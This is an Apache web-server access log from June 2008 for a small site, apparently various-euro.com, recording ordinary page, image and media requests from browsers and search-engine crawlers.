202.174.155.203 - - [04/Jun/2008:20:06:26 +0200] "GET /bannerz/GNouban.gif HTTP/1.0" 200 37201 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:06:28 +0200] "GET /bannerz/asco-o.gif HTTP/1.0" 200 19735 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:06:44 +0200] "GET /bannerz/fbwn-banner.gif HTTP/1.0" 200 5121 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:06:47 +0200] "GET /bannerz/fbwnpi.gif HTTP/1.0" 200 42068 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:06:49 +0200] "GET /bannerz/restate.gif HTTP/1.0" 200 22259 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:07:10 +0200] "GET /bannerz/pavuJapbanner.gif HTTP/1.0" 200 14954 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:07:12 +0200] "GET /bannerz/pavuokwui.gif HTTP/1.0" 200 82088 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:07:18 +0200] "GET /bannerz/euross-big.gif HTTP/1.0" 200 19738 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:07:39 +0200] "GET /ve-icon-2.ico HTTP/1.0" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:07:56 +0200] "GET /framez-sponsor.html HTTP/1.0" 200 4325 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:07:57 +0200] "GET /frame-menu.html HTTP/1.0" 200 10492 "http://www.various-euro.com/framez-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:07:58 +0200] "GET /f-sponsor.html HTTP/1.0" 200 8578 "http://www.various-euro.com/framez-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:08:02 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "http://www.various-euro.com/framez-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:08:05 +0200] "GET /bannerz/ubu-shot.png HTTP/1.0" 200 200117 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:08:08 +0200] "GET /bannerz/ve.jpg HTTP/1.0" 200 36912 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:08:38 +0200] "GET /bannerz/various-euro-girl.jpg HTTP/1.0" 200 91514 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
74.6.22.101 - - [04/Jun/2008:20:16:45 +0200] "GET /bmpp/eurolauf.html HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:20:18:16 +0200] "GET /f-contact.html HTTP/1.0" 200 6804 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:20:18:48 +0200] "GET /neon/girl-tv.html HTTP/1.0" 200 1717 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
84.190.25.44 - - [04/Jun/2008:20:20:47 +0200] "GET / HTTP/1.1" 200 10127 "-" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:47 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:48 +0200] "GET /framez_0.html HTTP/1.1" 200 12444 "http://www.various-euro.com/" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:50 +0200] "GET /framez.html HTTP/1.1" 200 3883 "http://www.various-euro.com/framez_0.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:50 +0200] "GET /frame-menu.html HTTP/1.1" 200 10492 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:50 +0200] "GET /frame-inhalt.html HTTP/1.1" 200 5834 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:50 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:50 +0200] "GET /bannerz/neon_click_3.gif HTTP/1.1" 200 240 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:50 +0200] "GET /eurosign3.gif HTTP/1.1" 200 7879 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:50 +0200] "GET /bannerz/neon_click_1.gif HTTP/1.1" 200 890 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:50 +0200] "GET /bannerz/wet.gif HTTP/1.1" 200 18561 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:50 +0200] "GET /bannerz/google/Logo_40blk.gif HTTP/1.1" 200 2308 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:50 +0200] "GET /bannerz/neon_click_2.gif HTTP/1.1" 200 387 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:50 +0200] "GET /bannerz/douwil.gif HTTP/1.1" 200 528 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:50 +0200] "GET /bannerz/anti_black_small.gif HTTP/1.1" 200 1009 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:50 +0200] "GET /bannerz/copyleft_black_small.gif HTTP/1.1" 200 1231 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:50 +0200] "GET /bannerz/goolag_468.jpg HTTP/1.1" 200 28285 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:50 +0200] "GET /bannerz/ve.jpg HTTP/1.1" 200 36912 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:50 +0200] "GET /bannerz/various-euro-girl.jpg HTTP/1.1" 200 91514 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:50 +0200] "GET /bannerz/ubu-shot.png HTTP/1.1" 200 200117 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:59 +0200] "GET /mashup/ HTTP/1.1" 200 604 "-" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:20:20:59 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
74.6.22.101 - - [04/Jun/2008:20:20:34 +0200] "GET /rez/554.mp3 HTTP/1.0" 200 13335140 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
84.190.25.44 - - [04/Jun/2008:20:22:10 +0200] "GET /mashup/ HTTP/1.1" 200 166 "-" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
81.52.143.16 - - [04/Jun/2008:20:32:44 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
81.52.143.16 - - [04/Jun/2008:20:32:46 +0200] "GET /neon/warning.html HTTP/1.1" 200 5134 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
194.249.47.244 - - [04/Jun/2008:20:54:32 +0200] "GET /schubb/schubb-4.html HTTP/1.1" 200 17746 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
74.6.22.101 - - [04/Jun/2008:20:56:54 +0200] "GET /schubb/schubb-2.html HTTP/1.0" 200 16660 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:21:14:54 +0200] "GET /bmpp/euro_pal_111.html HTTP/1.0" 200 2129 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.211.169 - - [04/Jun/2008:21:21:34 +0200] "GET /bmpp/18_x.html HTTP/1.1" 200 1100 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.109.195 - - [04/Jun/2008:21:22:49 +0200] "GET /bmpp/18_x.html HTTP/1.0" 200 1100 "http://search.live.com/results.aspx?q=years&form=QBHP" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
81.52.143.16 - - [04/Jun/2008:21:24:09 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
81.52.143.16 - - [04/Jun/2008:21:24:13 +0200] "GET /bmpp/18.html HTTP/1.1" 200 4467 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
65.55.211.158 - - [04/Jun/2008:21:28:52 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.158 - - [04/Jun/2008:21:28:53 +0200] "GET /f-rez.html HTTP/1.1" 200 9765 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.66.4 - - [04/Jun/2008:21:48:23 +0200] "GET /zampa-lovers/index.html HTTP/1.1" 200 37790 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.22.101 - - [04/Jun/2008:22:01:50 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.101 - - [04/Jun/2008:22:01:51 +0200] "GET /f-channel1.html HTTP/1.0" 200 5713 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.150.189.124 - - [04/Jun/2008:22:15:01 +0200] "GET /f-bannnerz.html HTTP/1.1" 200 12651 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
200.150.189.124 - - [04/Jun/2008:22:15:24 +0200] "GET /f-bannnerz.html HTTP/1.1" 200 12651 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
128.54.59.208 - - [04/Jun/2008:22:19:00 +0200] "GET / HTTP/1.0" 200 10127 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008040514 Firefox/3.0b5"
128.54.59.208 - - [04/Jun/2008:22:19:02 +0200] "GET / HTTP/1.0" 200 10127 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008040514 Firefox/3.0b5"
128.54.59.208 - - [04/Jun/2008:22:19:03 +0200] "GET /ve-icon-2.ico HTTP/1.0" 200 2238 "http://www.various-euro.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008040514 Firefox/3.0b5"
128.54.59.208 - - [04/Jun/2008:22:19:12 +0200] "GET /framez.html HTTP/1.0" 200 3883 "http://www.various-euro.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008040514 Firefox/3.0b5"
65.55.25.145 - - [04/Jun/2008:22:19:22 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.25.145 - - [04/Jun/2008:22:19:22 +0200] "GET / HTTP/1.1" 200 10127 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.6.28.92 - - [04/Jun/2008:22:26:28 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.48 - - [04/Jun/2008:22:26:28 +0200] "GET /bmpp/euro_pal_111.html HTTP/1.0" 200 2129 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
83.87.36.137 - - [04/Jun/2008:22:58:48 +0200] "GET /framez.html HTTP/1.1" 200 3883 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
83.87.36.137 - - [04/Jun/2008:22:58:48 +0200] "GET /frame-menu.html HTTP/1.1" 200 10492 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
83.87.36.137 - - [04/Jun/2008:22:58:49 +0200] "GET /frame-inhalt.html HTTP/1.1" 200 5834 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
83.87.36.137 - - [04/Jun/2008:22:58:50 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
79.138.175.1 - - [04/Jun/2008:23:08:20 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
79.138.175.1 - - [04/Jun/2008:23:08:20 +0200] "GET /zampa/slike/zampa.gif HTTP/1.1" 304 - "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
79.138.175.1 - - [04/Jun/2008:23:08:20 +0200] "GET /zampa/slike/udupetu.gif HTTP/1.1" 304 - "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
79.138.175.1 - - [04/Jun/2008:23:08:20 +0200] "GET /zampa/slike/inthearse.gif HTTP/1.1" 304 - "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.216.71.136 - - [04/Jun/2008:23:09:33 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
89.216.71.136 - - [04/Jun/2008:23:09:36 +0200] "GET /zampa/slike/zampa.gif HTTP/1.1" 200 5310 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
89.216.71.136 - - [04/Jun/2008:23:09:36 +0200] "GET /zampa/slike/udupetu.gif HTTP/1.1" 200 4138 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
89.216.71.136 - - [04/Jun/2008:23:09:36 +0200] "GET /zampa/slike/inthearse.gif HTTP/1.1" 200 4077 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
89.216.71.136 - - [04/Jun/2008:23:09:38 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
89.216.71.136 - - [04/Jun/2008:23:09:54 +0200] "GET /zampa/montenegro/index.html HTTP/1.1" 200 2651 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
89.216.71.136 - - [04/Jun/2008:23:09:55 +0200] "GET /zampa/montenegro/slike/plakat.jpg HTTP/1.1" 200 47879 "http://www.various-euro.com/zampa/montenegro/index.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
79.138.175.1 - - [04/Jun/2008:23:09:58 +0200] "GET /zampa/montenegro/index.html HTTP/1.1" 200 2651 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
79.138.175.1 - - [04/Jun/2008:23:09:58 +0200] "GET /zampa/montenegro/slike/plakat.jpg HTTP/1.1" 304 - "http://www.various-euro.com/zampa/montenegro/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
79.138.175.1 - - [04/Jun/2008:23:10:53 +0200] "GET /zampa/lybia/index.html HTTP/1.1" 200 3036 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
79.138.175.1 - - [04/Jun/2008:23:10:54 +0200] "GET /zampa/lybia/slike/tele.jpg HTTP/1.1" 304 - "http://www.various-euro.com/zampa/lybia/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
79.138.175.1 - - [04/Jun/2008:23:11:06 +0200] "GET /zampa/slike/S1TITEL.GIF HTTP/1.1" 200 15244 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.195.37.109 - - [04/Jun/2008:23:13:10 +0200] "GET /neon/girlz3.html HTTP/1.0" 200 2479 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:23:43:11 +0200] "GET /rez/ HTTP/1.0" 403 1223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.52.245.146 - - [04/Jun/2008:23:46:45 +0200] "GET / HTTP/1.0" 200 10127 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
128.54.54.44 - - [04/Jun/2008:23:48:42 +0200] "GET / HTTP/1.0" 200 10127 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008040514 Firefox/3.0b5"
128.54.54.44 - - [04/Jun/2008:23:48:45 +0200] "GET /ve-icon-2.ico HTTP/1.0" 200 2238 "http://www.various-euro.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008040514 Firefox/3.0b5"
128.54.54.44 - - [04/Jun/2008:23:48:51 +0200] "GET /framez.html HTTP/1.0" 200 3883 "http://www.various-euro.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008040514 Firefox/3.0b5"
74.6.22.101 - - [04/Jun/2008:23:49:41 +0200] "GET /rez/611.mp3 HTTP/1.0" 200 6782540 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.101 - - [04/Jun/2008:23:56:28 +0200] "GET /neon/slow-walk.html HTTP/1.0" 200 1640 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.211.169 - - [05/Jun/2008:00:02:38 +0200] "GET /3dsf3/sendi/receiver.html HTTP/1.1" 200 1402 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.6.18.47 - - [05/Jun/2008:00:12:30 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.227 - - [05/Jun/2008:00:12:30 +0200] "GET /f-world.html HTTP/1.0" 200 35590 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [05/Jun/2008:00:56:38 +0200] "GET /logz_old.html HTTP/1.0" 404 2748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [05/Jun/2008:01:05:57 +0200] "GET /neon/ HTTP/1.0" 403 1223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.66.4 - - [05/Jun/2008:01:27:44 +0200] "GET /f-zeug.html HTTP/1.1" 200 45338 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.214.45.101 - - [05/Jun/2008:01:27:52 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
65.214.45.101 - - [05/Jun/2008:01:27:52 +0200] "GET / HTTP/1.0" 200 10127 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
193.252.149.16 - - [05/Jun/2008:01:29:55 +0200] "GET / HTTP/1.1" 200 10127 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
66.249.66.4 - - [05/Jun/2008:01:31:06 +0200] "GET /f-bannnerz.html HTTP/1.1" 200 12651 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.9.49 - - [05/Jun/2008:01:32:51 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.54.30 - - [05/Jun/2008:01:32:52 +0200] "GET /f-search.html HTTP/1.0" 200 11800 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.252.149.16 - - [05/Jun/2008:01:47:10 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.149.16 - - [05/Jun/2008:01:47:12 +0200] "GET /DgH/ HTTP/1.1" 200 5024 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
74.6.22.101 - - [05/Jun/2008:01:50:05 +0200] "GET /bmpp/18_x.html HTTP/1.0" 200 1100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [05/Jun/2008:01:57:10 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.0" 200 520196 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.66.4 - - [05/Jun/2008:02:07:44 +0200] "GET /zampa/montenegro/index.html HTTP/1.1" 200 2651 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.37.109 - - [05/Jun/2008:02:08:49 +0200] "GET /DgH/bull/ HTTP/1.0" 200 1915 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.19.152.74 - - [05/Jun/2008:02:12:06 +0200] "GET / HTTP/1.1" 200 10127 "-" "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0"
65.55.211.158 - - [05/Jun/2008:02:23:01 +0200] "GET /f-logz_old.html HTTP/1.1" 200 43773 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.110.165 - - [05/Jun/2008:02:24:13 +0200] "GET /f-logz_old.html HTTP/1.0" 200 43773 "http://search.live.com/results.aspx?q=various&form=QBHP" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
128.54.48.98 - - [05/Jun/2008:02:27:26 +0200] "GET / HTTP/1.0" 200 10127 "http://modukit.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008040514 Firefox/3.0b5"
74.6.22.101 - - [05/Jun/2008:02:30:40 +0200] "GET /logs/usage_200702.html HTTP/1.0" 200 107861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.101 - - [05/Jun/2008:02:31:03 +0200] "GET /zampa/wonderland/index.html HTTP/1.0" 200 2084 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.252.149.15 - - [05/Jun/2008:02:33:03 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.149.15 - - [05/Jun/2008:02:33:09 +0200] "GET /f-channel1.html HTTP/1.1" 200 5713 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
24.82.91.241 - - [05/Jun/2008:02:52:21 +0200] "GET / HTTP/1.1" 302 353 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
24.82.91.241 - - [05/Jun/2008:02:52:22 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
